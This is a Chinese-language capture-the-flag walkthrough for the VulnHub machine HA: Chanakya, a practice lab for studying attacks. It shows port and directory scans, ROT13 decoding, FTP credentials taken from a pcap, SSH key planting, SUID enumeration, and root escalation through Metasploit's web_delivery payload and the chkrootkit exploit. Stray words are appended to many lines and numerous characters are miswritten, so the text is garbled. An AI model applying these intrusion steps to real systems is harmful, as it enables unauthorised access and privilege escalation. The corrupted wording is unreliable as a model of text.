靶機連接:php
https://www.vulnhub.com/entry/ha-chanakya,395/html
網絡主機探測:web
主機端口掃描:算法
nmap -p- -sC -sV 10.10.202.136shell
FTP 有認證json
HTTP目錄枚舉(dirb和dirsearch 多種工具使用枚舉)ubuntu
dirb http://10.10.202.136 -X .php,.txt,.html,.xml,.yml,.json網絡
---- Scanning URL: http://10.10.202.136/ ----
+ http://10.10.202.136/abuse.txt (CODE:200|SIZE:14)
+ http://10.10.202.136/child.html (CODE:200|SIZE:1508)
+ http://10.10.202.136/facts.html (CODE:200|SIZE:899)
+ http://10.10.202.136/index.html (CODE:200|SIZE:2382)
+ http://10.10.202.136/legacy.html (CODE:200|SIZE:1423)
+ http://10.10.202.136/personal.html (CODE:200|SIZE:1175)
+ http://10.10.202.136/work.html (CODE:200|SIZE:1400) session
這是一種ROT13的加密方式app
ROT13(迴轉13位)是一種簡易的替換式密碼算法。它是一種在英文網絡論壇用做隱藏八卦、妙句、謎題解答以及某些髒話的工具,目的是逃過版主或管理員的匆匆一瞥。ROT13 也是過去在古羅馬開發的凱撒密碼的一種變體。ROT13是它自身的逆反,即:要還原成原文只要使用同一算法便可得,故一樣的操做可用於加密與解密。該算法並無提供真正密碼學上的保全,故它不該該被用於須要保全的用途上。它經常被看成弱加密示例的典型。
應用ROT13到一段文字上僅僅只須要檢查字母順序並取代它在13位以後的對應字母,有須要超過期則從新繞回26英文字母開頭便可。A換成N、B換成O、依此類推到M換成Z,而後串行反轉:N換成A、O換成B、最後Z換成M。只有這些出如今英文字母裏的字符受影響;數字、符號、空白字符以及全部其餘字符都不變。替換後的字母大小寫保持不變。
在線解密:
https://rot13.com/
應該是pcap流量包,直接下載便可
獲取FTP明文密碼登陸便可
用戶的家目錄
發現無可利用的文件,那麼咱們直接本地產生祕鑰對,進行寫入祕鑰,而後進行登陸
本地直接登陸
提權操做:
uname -a
Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/vmware-user-suid-wrapper
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/su
/bin/ntfs-3g
ashoka@ubuntu:/tmp$ find / -perm -g=s -type f 2>/dev/null
/usr/bin/chage
/usr/bin/expiry
/usr/bin/wall
/usr/bin/mlocate
/usr/bin/bsd-write
/usr/bin/crontab
/usr/bin/ssh-agent
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
ashoka@ubuntu:/tmp$
這裏經過查看tmp 下的logs 目錄,系統安裝了chkrootkit軟件包,咱們嘗試使用它來提權
use exploit/multi/script/web_delivery
set lhost 10.10.202.133
生成payload,在靶機上執行,獲取shell
use exploit/unix/local/chkrootkit
msf5 exploit(unix/local/chkrootkit) > set session 1
session => 1
msf5 exploit(unix/local/chkrootkit) > set lport 8888
lport => 8888
msf5 exploit(unix/local/chkrootkit) > exploit
OVER !!
Happy new year !
Fuck 2019 !!